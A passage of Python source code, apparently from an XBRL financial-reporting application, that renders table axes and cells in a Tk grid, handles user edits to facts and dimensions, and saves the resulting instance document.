zAxisTypedDimension = dimConcept
combobox = self.table.initHeaderCombobox(self.dataFirstCol,
row-1,
colspan=0,
values=valueHeaders,
value=comboBoxValue,
selectindex=zStructuralNode.choiceNodeIndex if i >= 0 else None,
comboboxselected=self.onZComboBoxSelected)
combobox.zStructuralNode = zStructuralNode
combobox.zAxisIsOpenExplicitDimension = zAxisIsOpenExplicitDimension
combobox.zAxisTypedDimension = zAxisTypedDimension
combobox.zAxisAspectEntryMode = zAxisAspectEntryMode
combobox.zAxisAspect = aspect
combobox.zChoiceOrdIndex = row - 1
combobox.objectId = zStructuralNode.objectId()
# add aspect for chosen node
self.setZStructuralNodeAspects(chosenStructuralNode)
else:
#process aspect on this node before child nodes in case it is overridden
self.setZStructuralNodeAspects(zStructuralNode)
# nested nodes override parent nodes
for zStructuralNode in zStructuralNode.childStructuralNodes:
self.zAxis(row + 1, zStructuralNode, clearZchoices)
def setZStructuralNodeAspects(self, zStructuralNode, add=True):
for aspect in aspectModels[self.aspectModel]:
if (aspect in zStructuralNode.aspects or # might be added as custom-entered value (typed dim)
zStructuralNode.hasAspect(aspect, inherit=True)): #implies inheriting from other z axes
if aspect == Aspect.DIMENSIONS:
for dim in (zStructuralNode.aspectValue(Aspect.DIMENSIONS, inherit=True) or emptyList):
if add:
self.zAspectStructuralNodes[dim].add(zStructuralNode)
else:
self.zAspectStructuralNodes[dim].discard(zStructuralNode)
else:
if add:
self.zAspectStructuralNodes[aspect].add(zStructuralNode)
else:
self.zAspectStructuralNodes[aspect].discard(zStructuralNode)
def onZComboBoxSelected(self, event):
combobox = event.widget
structuralNode = combobox.zStructuralNode
if combobox.zAxisAspectEntryMode:
aspectValue = structuralNode.aspectEntryHeaderValues.get(combobox.get())
if aspectValue is not None:
self.zOrdinateChoices[structuralNode.definitionNode] = \
structuralNode.aspects = {combobox.zAxisAspect: aspectValue, 'aspectValueLabel': combobox.get()}
self.view() # redraw grid
elif combobox.zAxisIsOpenExplicitDimension and combobox.get() == "(all members)":
# reload combo box
self.comboboxLoadExplicitDimension(combobox,
structuralNode, # owner of combobox
structuralNode.choiceStructuralNodes[structuralNode.choiceNodeIndex]) # aspect filter node
structuralNode.choiceNodeIndex = -1 # use entry aspect value
combobox.zAxisAspectEntryMode = True
elif combobox.zAxisTypedDimension is not None and combobox.get() == "(enter typed member)":
# ask typed member entry
import tkinter.simpledialog
result = tkinter.simpledialog.askstring(_("Enter new typed dimension value"),
combobox.zAxisTypedDimension.label(),
parent=self.tabWin)
if result:
structuralNode.choiceNodeIndex = -1 # use entry aspect value
aspectValue = FunctionXfi.create_element(self.rendrCntx,
None,
(combobox.zAxisTypedDimension.typedDomainElement.qname, (), result))
self.zOrdinateChoices[structuralNode.definitionNode] = \
structuralNode.aspects = {combobox.zAxisAspect: aspectValue,
Aspect.DIMENSIONS: {combobox.zAxisTypedDimension.qname},
'aspectValueLabel': result}
if not hasattr(structuralNode, "aspectEntryHeaderValues"): structuralNode.aspectEntryHeaderValues = {}
structuralNode.aspectEntryHeaderValues[result] = aspectValue
valueHeaders = list(combobox["values"])
if result not in valueHeaders: valueHeaders.insert(0, result)
combobox["values"] = valueHeaders
combobox.zAxisAspectEntryMode = True
self.view() # redraw grid
else:
# remove prior combo choice aspect
self.setZStructuralNodeAspects(structuralNode.choiceStructuralNodes[structuralNode.choiceNodeIndex], add=False)
i = combobox.valueIndex
self.zOrdinateChoices[combobox.zStructuralNode.definitionNode] = structuralNode.choiceNodeIndex = i
# set current combo choice aspect
self.setZStructuralNodeAspects(structuralNode.choiceStructuralNodes[i])
self.view() # redraw grid
def xAxis(self, leftCol, topRow, rowBelow, xParentStructuralNode, xStructuralNodes, childrenFirst, renderNow, atTop):
if xParentStructuralNode is not None:
parentRow = rowBelow
noDescendants = True
rightCol = leftCol
widthToSpanParent = 0
for xStructuralNode in xParentStructuralNode.childStructuralNodes:
if not xStructuralNode.isRollUp:
noDescendants = False
isLabeled = xStructuralNode.isLabeled
isAbstract = (xStructuralNode.isAbstract or
(xStructuralNode.childStructuralNodes and
not isinstance(xStructuralNode.definitionNode, (ModelClosedDefinitionNode, ModelEuAxisCoord))))
isNonAbstract = not isAbstract
rightCol, row, width, leafNode = self.xAxis(leftCol, topRow + isLabeled, rowBelow, xStructuralNode, xStructuralNodes, # nested items before totals
childrenFirst, childrenFirst, False)
if row - 1 < parentRow:
parentRow = row - 1
#if not leafNode:
# rightCol -= 1
if isNonAbstract and isLabeled:
width += ENTRY_WIDTH_SCREEN_UNITS # width for this label, in screen units
widthToSpanParent += width
if childrenFirst:
thisCol = rightCol
else:
thisCol = leftCol
if renderNow and isLabeled:
columnspan = (rightCol - leftCol + (1 if isNonAbstract else 0))
label = xStructuralNode.header(lang=self.lang,
returnGenLabel=isinstance(xStructuralNode.definitionNode, (ModelClosedDefinitionNode, ModelEuAxisCoord)))
if label != OPEN_ASPECT_ENTRY_SURROGATE:
xValue = leftCol-1
yValue = topRow-1
headerLabel = label if label else " "
self.table.initHeaderCellValue(headerLabel,
xValue, yValue,
columnspan-1,
((row - topRow) if leafNode else 0),
XbrlTable.TG_CENTERED,
objectId=xStructuralNode.objectId(),
isRollUp=columnspan>1 and isNonAbstract and len(xStructuralNode.childStructuralNodes)<columnspan)
else:
self.aspectEntryObjectIdsNode[xStructuralNode.aspectEntryObjectId] = xStructuralNode
self.aspectEntryObjectIdsCell[xStructuralNode.aspectEntryObjectId] = self.table.initHeaderCombobox(leftCol-1,
topRow-1,
values=self.aspectEntryValues(xStructuralNode),
objectId=xStructuralNode.aspectEntryObjectId,
comboboxselected=self.onAspectComboboxSelection)
if isNonAbstract:
xValue = thisCol - 1
for i, role in enumerate(self.colHdrNonStdRoles):
j = (self.dataFirstRow
- len(self.colHdrNonStdRoles) + i)-1
self.table.initHeaderCellValue(xStructuralNode.header(role=role, lang=self.lang),
xValue,
j,
0,
0,
XbrlTable.TG_CENTERED,
objectId=xStructuralNode.objectId())
xStructuralNodes.append(xStructuralNode)
if isNonAbstract:
rightCol += 1
if renderNow and not childrenFirst:
self.xAxis(leftCol + (1 if isNonAbstract else 0), topRow + isLabeled, rowBelow, xStructuralNode, xStructuralNodes, childrenFirst, True, False) # render on this pass
leftCol = rightCol
return (rightCol, parentRow, widthToSpanParent, noDescendants)
def yAxis(self, leftCol, row, yParentStructuralNode, childrenFirst, renderNow, atLeft):
if yParentStructuralNode is not None:
nestedBottomRow = row
for yStructuralNode in yParentStructuralNode.childStructuralNodes:
if not yStructuralNode.isRollUp:
isAbstract = (yStructuralNode.isAbstract or
(yStructuralNode.childStructuralNodes and
not isinstance(yStructuralNode.definitionNode, (ModelClosedDefinitionNode, ModelEuAxisCoord))))
isNonAbstract = not isAbstract
isLabeled = yStructuralNode.isLabeled
nestRow, nextRow = self.yAxis(leftCol + isLabeled, row, yStructuralNode, # nested items before totals
childrenFirst, childrenFirst, False)
topRow = row
if childrenFirst and isNonAbstract:
row = nextRow
if renderNow and isLabeled:
columnspan = self.rowHdrCols - leftCol + 1 if isNonAbstract or nextRow == row else 1
depth = yStructuralNode.depth
wraplength = (self.rowHdrColWidth[depth] if isAbstract else
self.rowHdrWrapLength - sum(self.rowHdrColWidth[0:depth]))
if wraplength < 0:
wraplength = self.rowHdrColWidth[depth]
label = yStructuralNode.header(lang=self.lang,
returnGenLabel=isinstance(yStructuralNode.definitionNode, (ModelClosedDefinitionNode, ModelEuAxisCoord)),
recurseParent=not isinstance(yStructuralNode.definitionNode, ModelFilterDefinitionNode))
if label != OPEN_ASPECT_ENTRY_SURROGATE:
xValue = leftCol-1
yValue = row-1
self.table.initHeaderCellValue(label if label is not None else " ",
xValue, yValue,
columnspan-1,
(nestRow - row if isAbstract else 1)-1,
(XbrlTable.TG_LEFT_JUSTIFIED
if isNonAbstract or nestRow == row
else XbrlTable.TG_CENTERED),
objectId=yStructuralNode.objectId(),
isRollUp=columnspan>1 and isNonAbstract and (len(yStructuralNode.childStructuralNodes)>1 or (len(yStructuralNode.childStructuralNodes)==1 and not(yStructuralNode.childStructuralNodes[0].isAbstract))))
else:
self.aspectEntryObjectIdsNode[yStructuralNode.aspectEntryObjectId] = yStructuralNode
self.aspectEntryObjectIdsCell[yStructuralNode.aspectEntryObjectId] = self.table.initHeaderCombobox(leftCol-1,
row-1,
values=self.aspectEntryValues(yStructuralNode),
objectId=yStructuralNode.aspectEntryObjectId,
comboboxselected=self.onAspectComboboxSelection)
if isNonAbstract:
for i, role in enumerate(self.rowHdrNonStdRoles):
isCode = "code" in role
docCol = self.dataFirstCol - len(self.rowHdrNonStdRoles) + i-1
yValue = row-1
self.table.initHeaderCellValue(yStructuralNode.header(role=role, lang=self.lang),
docCol, yValue,
0, 0,
XbrlTable.TG_CENTERED if isCode else XbrlTable.TG_RIGHT_JUSTIFIED,
objectId=yStructuralNode.objectId())
if isNonAbstract:
row += 1
elif childrenFirst:
row = nextRow
if nestRow > nestedBottomRow:
nestedBottomRow = nestRow + (isNonAbstract and not childrenFirst)
if row > nestedBottomRow:
nestedBottomRow = row
#if renderNow and not childrenFirst:
# dummy, row = self.yAxis(leftCol + 1, row, yStructuralNode, childrenFirst, True, False) # render on this pass
if not childrenFirst:
dummy, row = self.yAxis(leftCol + isLabeled, row, yStructuralNode, childrenFirst, renderNow, False) # render on this pass
return (nestedBottomRow, row)
def getbackgroundColor(self, factPrototype):
bgColor = XbrlTable.TG_BG_DEFAULT # default monetary
concept = factPrototype.concept
if concept == None:
return bgColor
isNumeric = concept.isNumeric
# isMonetary = concept.isMonetary
isInteger = concept.baseXbrliType in integerItemTypes
isPercent = concept.typeQname in (qnPercentItemType, qnPureItemType)
isString = concept.baseXbrliType in ("stringItemType", "normalizedStringItemType")
isDate = concept.baseXbrliType in ("dateTimeItemType", "dateItemType")
if isNumeric:
if concept.isShares or isInteger:
bgColor = XbrlTable.TG_BG_ORANGE
elif isPercent:
bgColor = XbrlTable.TG_BG_YELLOW
# else assume isMonetary
elif isDate:
bgColor = XbrlTable.TG_BG_GREEN
elif isString:
bgColor = XbrlTable.TG_BG_VIOLET
return bgColor;
def bodyCells(self, row, yParentStructuralNode, xStructuralNodes, zAspectStructuralNodes, yChildrenFirst):
if yParentStructuralNode is not None:
dimDefaults = self.modelXbrl.qnameDimensionDefaults
for yStructuralNode in yParentStructuralNode.childStructuralNodes:
if yChildrenFirst:
row = self.bodyCells(row, yStructuralNode, xStructuralNodes, zAspectStructuralNodes, yChildrenFirst)
if not (yStructuralNode.isAbstract or
(yStructuralNode.childStructuralNodes and
not isinstance(yStructuralNode.definitionNode, (ModelClosedDefinitionNode, ModelEuAxisCoord)))) and yStructuralNode.isLabeled:
isYEntryPrototype = yStructuralNode.isEntryPrototype(default=False) # row to enter open aspects
yAspectStructuralNodes = defaultdict(set)
for aspect in aspectModels[self.aspectModel]:
if yStructuralNode.hasAspect(aspect):
if aspect == Aspect.DIMENSIONS:
for dim in (yStructuralNode.aspectValue(Aspect.DIMENSIONS) or emptyList):
yAspectStructuralNodes[dim].add(yStructuralNode)
else:
yAspectStructuralNodes[aspect].add(yStructuralNode)
yTagSelectors = yStructuralNode.tagSelectors
# data for columns of row
#print ("row " + str(row) + "yNode " + yStructuralNode.definitionNode.objectId() )
ignoreDimValidity = self.ignoreDimValidity.get()
# Reuse already computed facts partition in case of open Y axis
if True and hasattr(yStructuralNode, "factsPartition"):
factsPartition = yStructuralNode.factsPartition
else:
factsPartition = None
for i, xStructuralNode in enumerate(xStructuralNodes):
isEntryPrototype = isYEntryPrototype or xStructuralNode.isEntryPrototype(default=False)
xAspectStructuralNodes = defaultdict(set)
for aspect in aspectModels[self.aspectModel]:
if xStructuralNode.hasAspect(aspect):
if aspect == Aspect.DIMENSIONS:
for dim in (xStructuralNode.aspectValue(Aspect.DIMENSIONS) or emptyList):
xAspectStructuralNodes[dim].add(xStructuralNode)
else:
xAspectStructuralNodes[aspect].add(xStructuralNode)
cellTagSelectors = yTagSelectors | xStructuralNode.tagSelectors
cellAspectValues = {}
matchableAspects = set()
for aspect in _DICT_SET(xAspectStructuralNodes.keys()) | _DICT_SET(yAspectStructuralNodes.keys()) | _DICT_SET(zAspectStructuralNodes.keys()):
aspectValue = xStructuralNode.inheritedAspectValue(yStructuralNode,
self, aspect, cellTagSelectors,
xAspectStructuralNodes, yAspectStructuralNodes, zAspectStructuralNodes)
# value is None for a dimension whose value is to be not reported in this slice
if (isinstance(aspect, _INT) or # not a dimension
dimDefaults.get(aspect) != aspectValue or # explicit dim defaulted will equal the value
aspectValue is not None): # typed dim absent will be none
cellAspectValues[aspect] = aspectValue
matchableAspects.add(aspectModelAspect.get(aspect,aspect)) #filterable aspect from rule aspect
cellDefaultedDims = _DICT_SET(dimDefaults) - _DICT_SET(cellAspectValues.keys())
priItemQname = cellAspectValues.get(Aspect.CONCEPT)
concept = self.modelXbrl.qnameConcepts.get(priItemQname)
conceptNotAbstract = concept is None or not concept.isAbstract
value = None
objectId = None
justify = None
fp = FactPrototype(self, cellAspectValues)
if conceptNotAbstract:
# reduce set of matchable facts to those with pri item qname and have dimension aspects
facts = self.modelXbrl.factsByQname[priItemQname] if priItemQname else self.modelXbrl.factsInInstance
if self.hasTableFilters:
facts = self.modelTable.filterFacts(self.rendrCntx, facts)
for aspect in matchableAspects: # trim down facts with explicit dimensions match or just present
if isinstance(aspect, QName):
aspectValue = cellAspectValues.get(aspect, None)
if isinstance(aspectValue, ModelDimensionValue):
if aspectValue.isExplicit:
dimMemQname = aspectValue.memberQname # match facts with this explicit value
else:
dimMemQname = None # match facts that report this dimension
elif isinstance(aspectValue, QName):
dimMemQname = aspectValue # match facts that have this explicit value
elif aspectValue is None: # match typed dims that don't report this value
dimMemQname = ModelXbrl.DEFAULT
else:
dimMemQname = None # match facts that report this dimension
facts = facts & self.modelXbrl.factsByDimMemQname(aspect, dimMemQname)
if len(facts)==0:
break;
for fact in facts:
if (all(aspectMatches(self.rendrCntx, fact, fp, aspect)
for aspect in matchableAspects) and
all(fact.context.dimMemberQname(dim,includeDefaults=True) in (dimDefaults[dim], None)
for dim in cellDefaultedDims) and
len(fp.context.qnameDims) == len(fact.context.qnameDims)):
if yStructuralNode.hasValueExpression(xStructuralNode):
value = yStructuralNode.evalValueExpression(fact, xStructuralNode)
else:
value = fact.effectiveValue
objectId = fact.objectId()
# we can now remove that fact if we picked up from the computed partition entry
if factsPartition is not None:
factsPartition.remove(fact)
justify = XbrlTable.TG_RIGHT_JUSTIFIED if fact.isNumeric else XbrlTable.TG_LEFT_JUSTIFIED
break
if (conceptNotAbstract and
(value is not None or ignoreDimValidity or isFactDimensionallyValid(self, fp) or
isEntryPrototype)):
if objectId is None:
objectId = "f{0}".format(len(self.factPrototypes))
self.factPrototypes.append(fp) # for property views
for aspect, aspectValue in cellAspectValues.items():
if isinstance(aspectValue, str) and aspectValue.startswith(OPEN_ASPECT_ENTRY_SURROGATE):
self.factPrototypeAspectEntryObjectIds[objectId].add(aspectValue)
modelConcept = fp.concept
if (justify is None) and modelConcept is not None:
justify = XbrlTable.TG_RIGHT_JUSTIFIED if modelConcept.isNumeric else XbrlTable.TG_LEFT_JUSTIFIED
if modelConcept is not None and modelConcept.isEnumeration:
myValidationObject = ValidateXbrl(self.modelXbrl)
myValidationObject.modelXbrl = self.modelXbrl
enumerationSet = ValidateXbrlDimensions.usableEnumerationMembers(myValidationObject, modelConcept)
enumerationDict = dict()
for enumerationItem in enumerationSet:
# we need to specify the concept linkrole to sort out between possibly many different labels
enumerationDict[enumerationItem.label(linkrole=modelConcept.enumLinkrole)] = enumerationItem.qname
enumerationValues = sorted(list(enumerationDict.keys()))
enumerationQNameStrings = [""]+list(str(enumerationDict[enumerationItem]) for enumerationItem in enumerationValues)
enumerationValues = [""]+enumerationValues
try:
selectedIdx = enumerationQNameStrings.index(value)
effectiveValue = enumerationValues[selectedIdx]
except ValueError:
effectiveValue = enumerationValues[0]
selectedIdx = 0
xValue = self.dataFirstCol + i-1
yValue = row-1
self.table.initCellCombobox(effectiveValue,
enumerationValues,
xValue,
yValue,
objectId=objectId,
selectindex=selectedIdx,
codes=enumerationDict)
elif modelConcept is not None and modelConcept.type.qname == XbrlConst.qnXbrliQNameItemType:
if eurofilingModelPrefix in concept.nsmap and concept.nsmap.get(eurofilingModelPrefix) == eurofilingModelNamespace:
hierarchy = concept.get("{" + eurofilingModelNamespace + "}" + "hierarchy", None)
domainQNameAsString = concept.get("{" + eurofilingModelNamespace + "}" + "domain", None)
if hierarchy is not None and domainQNameAsString is not None:
newAspectValues = [""]
newAspectQNames = dict()
newAspectQNames[""] = None
domPrefix, _, domLocalName = domainQNameAsString.strip().rpartition(":")
domNamespace = concept.nsmap.get(domPrefix)
relationships = concept_relationships(self.rendrCntx,
None,
(QName(domPrefix, domNamespace, domLocalName),
hierarchy, # linkrole,
"XBRL-dimensions",
'descendant'),
False) # return flat list
for rel in relationships:
if (rel.arcrole in (XbrlConst.dimensionDomain, XbrlConst.domainMember)
and rel.isUsable):
header = rel.toModelObject.label(lang=self.lang)
newAspectValues.append(header)
currentQName = rel.toModelObject.qname
if str(currentQName) == value:
value = header
newAspectQNames[header] = currentQName
else:
newAspectValues = None
else:
newAspectValues = None
if newAspectValues is None:
xValue = self.dataFirstCol + i-1
yValue = row-1
self.table.initCellValue(value,
xValue,
yValue,
justification=justify,
objectId=objectId,
backgroundColourTag=self.getbackgroundColor(fp))
else:
qNameValues = newAspectValues
try:
selectedIdx = qNameValues.index(value)
effectiveValue = value
except ValueError:
effectiveValue = qNameValues[0]
selectedIdx = 0
xValue = self.dataFirstCol + i-1
yValue = row-1
self.table.initCellCombobox(effectiveValue,
qNameValues,
xValue,
yValue,
objectId=objectId,
selectindex=selectedIdx,
codes=newAspectQNames)
elif modelConcept is not None and modelConcept.type.qname == XbrlConst.qnXbrliBooleanItemType:
booleanValues = ["",
XbrlConst.booleanValueTrue,
XbrlConst.booleanValueFalse]
try:
selectedIdx = booleanValues.index(value)
effectiveValue = value
except ValueError:
effectiveValue = booleanValues[0]
selectedIdx = 0
xValue = self.dataFirstCol + i-1
yValue = row-1
self.table.initCellCombobox(effectiveValue,
booleanValues,
xValue,
yValue,
objectId=objectId,
selectindex=selectedIdx)
else:
xValue = self.dataFirstCol + i-1
yValue = row-1
self.table.initCellValue(value,
xValue,
yValue,
justification=justify,
objectId=objectId,
backgroundColourTag=self.getbackgroundColor(fp))
else:
fp.clear() # dereference
row += 1
if not yChildrenFirst:
row = self.bodyCells(row, yStructuralNode, xStructuralNodes, zAspectStructuralNodes, yChildrenFirst)
return row
def onClick(self, event):
try:
objId = event.widget.objectId
if objId and objId[0] == "f":
viewableObject = self.factPrototypes[int(objId[1:])]
else:
viewableObject = objId
self.modelXbrl.viewModelObject(viewableObject)
except AttributeError: # not clickable
pass
self.modelXbrl.modelManager.cntlr.currentView = self
def cellEnter(self, *args):
# triggered on grid frame enter (not cell enter)
self.blockSelectEvent = 0
self.modelXbrl.modelManager.cntlr.currentView = self
def cellLeave(self, *args):
# triggered on grid frame leave (not cell leave)
self.blockSelectEvent = 1
# this method is not currently used
def cellSelect(self, *args):
if self.blockSelectEvent == 0 and self.blockViewModelObject == 0:
self.blockViewModelObject += 1
#self.modelXbrl.viewModelObject(self.nodeToObjectId[self.treeView.selection()[0]])
#self.modelXbrl.viewModelObject(self.treeView.selection()[0])
self.blockViewModelObject -= 1
def viewModelObject(self, modelObject):
if self.blockViewModelObject == 0:
self.blockViewModelObject += 1
try:
if isinstance(modelObject, ModelDtsObject.ModelRelationship):
objectId = modelObject.toModelObject.objectId()
else:
objectId = modelObject.objectId()
if objectId in self.tablesToELR:
self.view(viewTblELR=self.tablesToELR[objectId])
try:
self.modelXbrl.modelManager.cntlr.currentView = self.modelXbrl.guiViews.tableView
# force focus (synch) on the corresponding "Table" tab (useful in case of several instances)
self.modelXbrl.guiViews.tableView.tabWin.select(str(self.modelXbrl.guiViews.tableView.viewFrame))
except:
pass
except (KeyError, AttributeError):
pass
self.blockViewModelObject -= 1
def onConfigure(self, event, *args):
if not self.blockMenuEvents:
lastFrameWidth = getattr(self, "lastFrameWidth", 0)
lastFrameHeight = getattr(self, "lastFrameHeight", 0)
frameWidth = self.tabWin.winfo_width()
frameHeight = self.tabWin.winfo_height()
if lastFrameWidth != frameWidth or lastFrameHeight != frameHeight:
self.updateInstanceFromFactPrototypes()
self.lastFrameWidth = frameWidth
self.lastFrameHeight = frameHeight
self.setHeightAndWidth()
if lastFrameWidth:
# frame resized, recompute row header column widths and lay out table columns
"""
def sleepAndReload():
time.sleep(.75)
self.viewReloadDueToMenuAction()
self.modelXbrl.modelManager.cntlr.uiThreadQueue.put((sleepAndReload, []))
"""
#self.modelXbrl.modelManager.cntlr.uiThreadQueue.put((self.viewReloadDueToMenuAction, []))
def deferredReload():
self.deferredReloadCount -= 1 # only do reload after all queued reload timers expire
if self.deferredReloadCount <= 0:
self.viewReloadDueToMenuAction()
self.deferredReloadCount = getattr(self, "deferredReloadCount", 0) + 1
self.viewFrame.after(1500, deferredReload)
def onQuitView(self, event, *args):
# this method is passed as callback when creating the view
# (to ScrolledTkTableFrame and then to XbrlTable that will monitor cell operations)
self.updateInstanceFromFactPrototypes()
self.updateProperties()
def hasChangesToSave(self):
return len(self.table.modifiedCells)
def updateProperties(self):
if self.modelXbrl is not None:
modelXbrl = self.modelXbrl
# make sure we handle an instance
if modelXbrl.modelDocument.type == ModelDocument.Type.INSTANCE:
tbl = self.table
# get coordinates of last currently operated cell
coordinates = tbl.getCurrentCellCoordinates()
if coordinates is not None:
# get object identifier from its coordinates in the current table
objId = tbl.getObjectId(coordinates)
if objId is not None and len(objId) > 0:
if objId and objId[0] == "f":
# fact prototype
viewableObject = self.factPrototypes[int(objId[1:])]
elif objId[0] != "a":
# instance fact
viewableObject = self.modelXbrl.modelObject(objId)
else:
return
modelXbrl.viewModelObject(viewableObject)
def updateInstanceFromFactPrototypes(self):
# Only update the model if it already exists
if self.modelXbrl is not None \
and self.modelXbrl.modelDocument.type == ModelDocument.Type.INSTANCE:
instance = self.modelXbrl
cntlr = instance.modelManager.cntlr
newCntx = ModelXbrl.AUTO_LOCATE_ELEMENT
newUnit = ModelXbrl.AUTO_LOCATE_ELEMENT
tbl = self.table
# check user keyed changes to aspects
aspectEntryChanges = {} # index = widget ID, value = widget contents
aspectEntryChangeIds = _DICT_SET(aspectEntryChanges.keys())
for modifiedCell in tbl.getCoordinatesOfModifiedCells():
objId = tbl.getObjectId(modifiedCell)
if objId is not None and len(objId)>0:
if tbl.isHeaderCell(modifiedCell):
if objId[0] == OPEN_ASPECT_ENTRY_SURROGATE:
aspectEntryChanges[objId] = tbl.getTableValue(modifiedCell)
else:
# check user keyed changes to facts
cellIndex = str(modifiedCell)
comboboxCells = tbl.window_names(cellIndex)
if comboboxCells is not None and len(comboboxCells)>0:
comboName = tbl.window_cget(cellIndex, '-window')
combobox = cntlr.parent.nametowidget(comboName)
else:
combobox = None
if isinstance(combobox, _Combobox):
codeDict = combobox.codes
if len(codeDict)>0: # the drop-down list shows labels, we want to have the actual values
bodyCellValue = tbl.getTableValue(modifiedCell)
value = codeDict.get(bodyCellValue, None)
if value is None:
value = bodyCellValue # this must be a qname!
else:
value = tbl.getTableValue(modifiedCell)
else:
value = tbl.getTableValue(modifiedCell)
objId = tbl.getObjectId(modifiedCell)
if objId is not None and len(objId)>0:
if objId[0] == "f":
factPrototypeIndex = int(objId[1:])
factPrototype = self.factPrototypes[factPrototypeIndex]
concept = factPrototype.concept
if concept is None:
if not self.conceptMessageIssued:
# This should be removed once cells have been disabled until every needed selection is done
self.conceptMessageIssued = True
self.modelXbrl.modelManager.cntlr.showMessage(_("Please make sure every Z axis selection is done"))
return
else:
self.conceptMessageIssued = False
entityIdentScheme = self.newFactItemOptions.entityIdentScheme
entityIdentValue = self.newFactItemOptions.entityIdentValue
periodType = concept.periodType
periodStart = self.newFactItemOptions.startDateDate if periodType == "duration" else None
periodEndInstant = self.newFactItemOptions.endDateDate
qnameDims = factPrototype.context.qnameDims
newAspectValues = self.newFactOpenAspects(objId)
if newAspectValues is None:
self.modelXbrl.modelManager.showStatus(_("Some open values are missing in an axis, the save is incomplete"), 5000)
continue
qnameDims.update(newAspectValues)
# open aspects widgets
prevCntx = instance.matchContext(
entityIdentScheme, entityIdentValue, periodType, periodStart, periodEndInstant,
qnameDims, [], [])
if prevCntx is not None:
cntxId = prevCntx.id
else: # need new context
newCntx = instance.createContext(entityIdentScheme, entityIdentValue,
periodType, periodStart, periodEndInstant,
concept.qname, qnameDims, [], [],
afterSibling=newCntx)
cntxId = newCntx.id # need new context
# new context
if concept.isNumeric:
if concept.isMonetary:
unitMeasure = qname(XbrlConst.iso4217, self.newFactItemOptions.monetaryUnit)
unitMeasure.prefix = "iso4217" # want to save with a recommended prefix
decimals = self.newFactItemOptions.monetaryDecimals
elif concept.isShares:
unitMeasure = XbrlConst.qnXbrliShares
decimals = self.newFactItemOptions.nonMonetaryDecimals
else:
unitMeasure = XbrlConst.qnXbrliPure
decimals = self.newFactItemOptions.nonMonetaryDecimals
prevUnit = instance.matchUnit([unitMeasure], [])
if prevUnit is not None:
unitId = prevUnit.id
else:
newUnit = instance.createUnit([unitMeasure], [], afterSibling=newUnit)
unitId = newUnit.id
attrs = [("contextRef", cntxId)]
if concept.isNumeric:
attrs.append(("unitRef", unitId))
attrs.append(("decimals", decimals))
value = Locale.atof(self.modelXbrl.locale, value, str.strip)
newFact = instance.createFact(concept.qname, attributes=attrs, text=value)
tbl.setObjectId(modifiedCell,
newFact.objectId()) # switch cell to now use fact ID
if self.factPrototypes[factPrototypeIndex] is not None:
self.factPrototypes[factPrototypeIndex].clear()
self.factPrototypes[factPrototypeIndex] = None #dereference fact prototype
elif objId[0] != "a": # instance fact, not prototype
fact = self.modelXbrl.modelObject(objId)
if fact.concept.isNumeric:
value = Locale.atof(self.modelXbrl.locale, value, str.strip)
if fact.concept.isMonetary:
unitMeasure = qname(XbrlConst.iso4217, self.newFactItemOptions.monetaryUnit)
unitMeasure.prefix = "iso4217" # want to save with a recommended prefix
decimals = self.newFactItemOptions.monetaryDecimals
elif fact.concept.isShares:
unitMeasure = XbrlConst.qnXbrliShares
decimals = self.newFactItemOptions.nonMonetaryDecimals
else:
unitMeasure = XbrlConst.qnXbrliPure
decimals = self.newFactItemOptions.nonMonetaryDecimals
if fact.value != str(value):
if fact.isNil != (not value):
fact.isNil = not value
if fact.isNil:
pass
#TODO: clear out nil facts
if fact.concept.isNumeric and (not fact.isNil): # if nil, there is no need to update these values
fact.decimals = decimals
prevUnit = instance.matchUnit([unitMeasure], [])
if prevUnit is not None:
unitId = prevUnit.id
else:
newUnit = instance.createUnit([unitMeasure], [], afterSibling=newUnit)
unitId = newUnit.id
fact.unitID = unitId
fact.text = str(value)
instance.setIsModified()
fact.xValid = UNVALIDATED
xmlValidate(instance, fact)
tbl.clearModificationStatus()
def saveInstance(self, newFilename=None, onSaved=None):
if (not self.newFactItemOptions.entityIdentScheme or # not initialized yet
not self.newFactItemOptions.entityIdentValue or
not self.newFactItemOptions.startDateDate or not self.newFactItemOptions.endDateDate):
if not getNewFactItemOptions(self.modelXbrl.modelManager.cntlr, self.newFactItemOptions):
return # new instance not set
# newFilename = None # only used when a new instance must be created
self.updateInstanceFromFactPrototypes()
if self.modelXbrl.modelDocument.type != ModelDocument.Type.INSTANCE and newFilename is None:
newFilename = self.modelXbrl.modelManager.cntlr.fileSave(view=self, fileType="xbrl")
if not newFilename:
return # saving cancelled
# continue saving in background
thread = threading.Thread(target=lambda: self.backgroundSaveInstance(newFilename, onSaved))
thread.daemon = True
thread.start()
def backgroundSaveInstance(self, newFilename=None, onSaved=None):
cntlr = self.modelXbrl.modelManager.cntlr
if newFilename and self.modelXbrl.modelDocument.type != ModelDocument.Type.INSTANCE:
self.modelXbrl.modelManager.showStatus(_("creating new instance {0}").format(os.path.basename(newFilename)))
self.modelXbrl.modelManager.cntlr.waitForUiThreadQueue() # force status update
self.modelXbrl.createInstance(newFilename) # creates an instance as this modelXbrl's entrypoint
instance = self.modelXbrl
cntlr.showStatus(_("Saving {0}").format(instance.modelDocument.basename))
cntlr.waitForUiThreadQueue() # force status update
self.updateInstanceFromFactPrototypes()
instance.saveInstance(newFilename) # may override prior filename for instance from main menu
cntlr.addToLog(_("{0} saved").format(newFilename if newFilename is not None else instance.modelDocument.filepath))
cntlr.showStatus(_("Saved {0}").format(instance.modelDocument.basename), clearAfter=3000)
if onSaved is not None:
self.modelXbrl.modelManager.cntlr.uiThreadQueue.put((onSaved, []))
def newFactOpenAspects(self, factObjectId):
aspectValues = {}
for aspectObjId in self.factPrototypeAspectEntryObjectIds[factObjectId]:
structuralNode = self.aspectEntryObjectIdsNode[aspectObjId]
for aspect in structuralNode.aspectsCovered():
if aspect != Aspect.DIMENSIONS:
break
gridCellItem = self.aspectEntryObjectIdsCell[aspectObjId]
value = gridCellItem.get()
# is aspect in a childStructuralNode?
if value is not None and OPEN_ASPECT_ENTRY_SURROGATE in aspectObjId and len(value)==0:
return None # some values are missing!
if value:
aspectValue = structuralNode.aspectEntryHeaderValues.get(value)
if aspectValue is None: # try converting value
if isinstance(aspect, QName): # dimension
dimConcept = self.modelXbrl.qnameConcepts[aspect]
if dimConcept.isExplicitDimension:
# value must be qname
aspectValue = None # need to find member for the description
else:
typedDimElement = dimConcept.typedDomainElement
aspectValue = FunctionXfi.create_element(
self.rendrCntx, None, (typedDimElement.qname, (), value))
if aspectValue is not None:
aspectValues[aspect] = aspectValue
return aspectValues
def aspectEntryValues(self, structuralNode):
for aspect in structuralNode.aspectsCovered():
if aspect != Aspect.DIMENSIONS:
break
